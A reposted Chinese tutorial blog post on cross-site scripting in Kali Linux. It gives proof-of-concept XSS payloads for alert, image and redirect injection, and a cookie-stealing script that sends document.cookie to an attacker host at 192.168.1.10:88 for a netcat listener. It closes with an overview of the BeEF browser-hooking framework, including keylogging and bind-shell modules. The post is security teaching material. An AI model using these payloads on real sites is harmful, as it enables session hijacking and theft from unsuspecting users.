kali linux之xss

Posted XxSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kali linux之xss相关的知识,希望对你有一定的参考价值。

攻击web客户端

客户端脚本语言(弹窗,广告,在浏览器中执行,javascript

javascript--与java语言无关,使用最广的客户端脚本语言

 

xss(cross-site scripting)

通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端攻击目的

注入客户端脚本代码,盗取cookie,重定向

 

使用场景:

直接嵌入html:<script> alert(\'xss\'); </script>

元素标签事件:<body onload=alert(\'xss\')>

图片标签:<img src="javascript:alert(\'xss\');">

其他标签:<iframe>,<div>,and<link>

dom对象,篡改页面内容

 

 

漏洞形成的根源:

服务器对用户提交数据过滤不严

提交给服务器的脚本被直接返回给其他客户端执行

脚本在客户端执行恶意操作

 

xss漏洞类型

存储型(持久型)

反射型(非持久)

DOM型

 

 

漏洞poc

<script> alert(\'xss\')</script> 验证弹窗

<a href=http://192.168.1.10>click  嵌入链接

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert(\'xss\')>  嵌入192.168.1.10的图片

 <script>window.location=\'http://192.168.1.10\'</script> 提交重定向到192.168.1.10

 

反射型xss

弹窗验证

 

 

 <a href=http://192.168.1.10>click 点击click就跳转到链接

 

 

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert(\'xss\')>  嵌入192.168.1.10的图片

 

 <script>window.location=\'http://192.168.1.10\'</script> 提交重定向到192.168.1.10

 

 

 

xss窃取cookie

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源码

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie发送到192.168.1.10 88端口)

 

在本机服务器写好源码,然后用nc监听好本机的88端口

 

执行就获取到cookie了

 

 

 

存储型xss

长期存储于服务器端,每次用户访问都会被执行javascript脚本

name:客户端表单长度限制--客户端,截断代理

 

窃取cookie源码

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源码

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie发送到192.168.1.10 88端口)

 

 

 成功获取cookie

 

 

 

beef

生成,交互payload

ruby语言编写

服务器端--------管理hooked客户端

客户端---------运行客户端浏览器的javascript脚本(hook)

 

浏览器攻击面:

应用普遍转移到b/s架构,浏览器成为统一客户端程序

结合社会工程学方法对浏览器进行攻击,攻击浏览器用户

通过注入js脚本,利用浏览器攻击其他网站

 

攻击手段:

利用网站xss漏洞实现攻击

诱使客户端访问含有hook的伪造站点

结合中间人攻击注入hook脚本

 

常见用途:

键盘记录

网络扫描

浏览器信息收集

绑定shell

与metasploit集成

 

 

默认用户名密码beef

 

Details:浏览器,插件版本信息,操作系统信息

Logs:浏览器动作----焦点变化,鼠标点击,信息输入

Commands:命令模块

         绿色模块:表示模块适合目标浏览器,并且执行结果被客户端不可见

         红色模块:表示模块不适用当前用户,有些红色模块也可以正常执行

         橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)

         灰色模块:模块未在目标浏览器上测试过

 

主要模块

Browsers

Exploits

Host

Persistence

Network

 

 

 

友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

以上是关于kali linux之xss的主要内容,如果未能解决你的问题,请参考以下文章

linux之kali系统ssh服务开启

kali linux之Bdfproxy

kali linux 之 DNS信息收集

kali linux之wireshark/tcpdump

kali linux之xss

Kali Linux信息收集之dnswalk